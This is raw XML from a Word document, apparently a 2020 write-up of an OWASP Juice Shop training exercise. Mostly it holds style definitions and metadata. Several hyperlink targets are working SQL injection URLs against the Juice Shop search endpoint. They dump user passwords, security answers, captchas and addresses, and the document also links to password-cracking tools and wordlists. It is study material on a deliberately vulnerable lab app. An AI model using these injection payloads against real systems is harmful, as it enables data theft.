  <w:style w:type="character" w:styleId="UnresolvedMention">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="004512D3"/>
    <w:rPr>
      <w:color w:val="605E5C"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="HTMLPreformatted">
    <w:name w:val="HTML Preformatted"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="HTMLPreformattedChar"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="002A1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A1155"/>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2A1155"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-keyword">
    <w:name w:val="hljs-keyword"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="002A1155"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-builtin">
    <w:name w:val="hljs-built_in"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="002A1155"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-comment">
    <w:name w:val="hljs-comment"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="002A1155"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-string">
    <w:name w:val="hljs-string"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="002A1155"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="pl-s">
    <w:name w:val="pl-s"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00BE3137"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="pl-s1">
    <w:name w:val="pl-s1"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="007F0156"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="pl-en">
    <w:name w:val="pl-en"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="007F0156"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="003C4065"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="FollowedHyperlink">
    <w:name w:val="FollowedHyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="002C7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935658">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="149626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localhost:8000"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juice-shop.herokuapp.com/rest/products/search?q=qwert%27))%20UNION%20SELECT%20username,%20password,%20%273%27,%20%274%27,%20%275%27,%20%276%27,%20%277%27,%20%278%27,%20%279%27%20FROM%20Users--" TargetMode="External"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.varonis.com/blog/john-the-rippe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juice-shop.herokuapp.com/rest/products/search?q=qwert%27))%20UNION%20SELECT%20q.question,%20a.answer,%20a.UserID,%20%274%27,%20%275%27,%20%276%27,%20%277%27,%20%278%27,%20%279%27%20FROM%20SecurityQuestions%20q%20INNER%20JOIN%20SecurityAnswers%20a%20ON%20q.id%20=%20a.id--" TargetMode="External"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://bkimminich.gitbooks.io/pwning-owasp-juice-shop/content/appendix/solutions.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juice-shop.herokuapp.com/rest/products/search?q=qwert%27))%20UNION%20SELECT%20captcha,%20answer,%20%273%27,%20%274%27,%20%275%27,%20%276%27,%20%277%27,%20%278%27,%20%279%27%20FROM%20Captchas--" TargetMode="External"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://portswigger.net/burp/documentation/desktop/tools/intruder" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image6.png"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://juice-shop.herokuapp.com/rest/products/search?q=qwert%27))%20UNION%20SELECT%20sql,%20%272%27,%20%273%27,%20%274%27,%20%275%27,%20%276%27,%20%277%27,%20%278%27,%20%279%27%20FROM%20sqlite_master--" TargetMode="External"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://gist.github.com/Twigonometry/a619bc5234d39296737e8d00899f23a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juice-shop.herokuapp.com/rest/products/search?q=qwert%27))%20UNION%20SELECT%20fullName,%20streetAddress,%20%27city%27,%20%27country%27,%20%27mobileNum%27,%20%276%27,%20%277%27,%20%278%27,%20%279%27%20FROM%20Addresses--" TargetMode="External"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image17.png"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.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13</Pages>
  <Words>3374</Words>
  <Characters>19236</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>160</Lines>
  <Paragraphs>45</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>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Goodwin</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Mac Goodwin</cp:lastModifiedBy>
  <cp:revision>355</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2020-10-10T19:38:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-10-21T21:11:00Z</dcterms:modified>
</cp:coreProperties>
</file>